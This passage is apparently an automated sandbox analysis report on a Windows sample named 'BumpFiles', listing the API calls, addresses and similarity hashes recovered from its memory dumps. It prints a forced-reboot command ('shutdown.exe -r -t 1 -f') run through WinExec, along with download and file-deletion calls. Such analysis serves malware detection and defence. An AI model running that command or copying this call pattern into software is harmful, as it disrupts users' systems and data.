                                                                    Similarity
                                                                    • API ID: Sleep$DownloadFile
                                                                    • String ID: dWe$hWe
                                                                    • API String ID: 2087964873-58362703
                                                                    • Opcode ID: 04cbe2486e640521b758a2ff6ddd802f746ddcb316689a65afaa4eebd1ce7cdd
                                                                    • Instruction ID: e38bbcdaf700aa6aab6cb9e7a4f3a98896630684cfae030678e04ef5b335f524
                                                                    • Opcode Fuzzy Hash: 04cbe2486e640521b758a2ff6ddd802f746ddcb316689a65afaa4eebd1ce7cdd
                                                                    • Instruction Fuzzy Hash: 62113D74600204AFD700EB55C892E8D77B5EF4A344F504076F504AB3E2D779AE019A99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000), ref: 00635882
                                                                    • WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0063588E
                                                                    • Sleep.KERNEL32(0000012C,00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?), ref: 00635898
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$Exec
                                                                    • String ID: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f$:c
                                                                    • API String ID: 1325486322-1912651170
                                                                    • Opcode ID: 9084fd4ac988e11f2c88bee64eed603d8c020462e05fad206a0e38efbd5631f5
                                                                    • Instruction ID: f61db4da6c67bcbcc9485dc9ace913e51ddd331a7a87c05aa1dac2d289d3923f
                                                                    • Opcode Fuzzy Hash: 9084fd4ac988e11f2c88bee64eed603d8c020462e05fad206a0e38efbd5631f5
                                                                    • Instruction Fuzzy Hash: ABD01230794B507DF11266667C23F197B4DD38AF14FD30466F601555D195B9641044ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042548C
                                                                    • GetLastError.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042549B
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254A3
                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254BE
                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254CC
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                    • String ID:
                                                                    • API String ID: 2814369299-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005EE1C9
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005EE1E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: DrivesLogical
                                                                    • String ID:
                                                                    • API String ID: 999431828-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000,00000000,00000000,00000000,00407D6A,?,?,?,00000000), ref: 00407D49
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CompareString
                                                                    • String ID:
                                                                    • API String ID: 1825529933-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,00000000,?,00492358,004B577C,00000000,004B57FC,?,?,00492358), ref: 00424AF7
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,00492358,004B5711,00000000,004B57FC,?,?,00492358), ref: 00424B49
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00400000,?,0000020A), ref: 0040C4B6
                                                                      • Part of subcall function 0040D70C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D748
                                                                      • Part of subcall function 0040D70C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D799
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: FileModuleName$LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 4113206344-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00633459,00000000,006334CB), ref: 004258F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CreateDirectory
                                                                    • String ID:
                                                                    • API String ID: 4241100979-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00409D83
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AllocString
                                                                    • String ID:
                                                                    • API String ID: 2525500382-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%